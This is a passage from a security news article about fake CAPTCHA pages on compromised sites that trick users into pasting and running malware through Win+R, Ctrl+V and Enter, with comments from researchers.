The attack begins through compromised websites containing malicious JavaScript. When users interact with these sites, they’re redirected to deceptive pages that display error messages or CAPTCHA verifications, urging users to perform actions such as copying and pasting commands into their system’s terminal or PowerShell.
“When a victim visits a malicious or compromised site, they see a message ‘Checking if the site connection is secure-Verify you are human’ just as they would on a real Cloudflare page,” Kelley said in a blog post. Subsequently, a pop-up or on-page message directs users through a sequence of key presses — including Win+R, Ctrl+V, and Enter — resulting in execution of the malware on their machine.
“The concept of phishing users with fake security controls is not a new one,” said James Maude, field CTO at BeyondTrust. “In the past, threat actors have had great success with phishing documents that trick users into allowing malicious macros to run using fake security checks that claim the document needs macros enabled for security.”
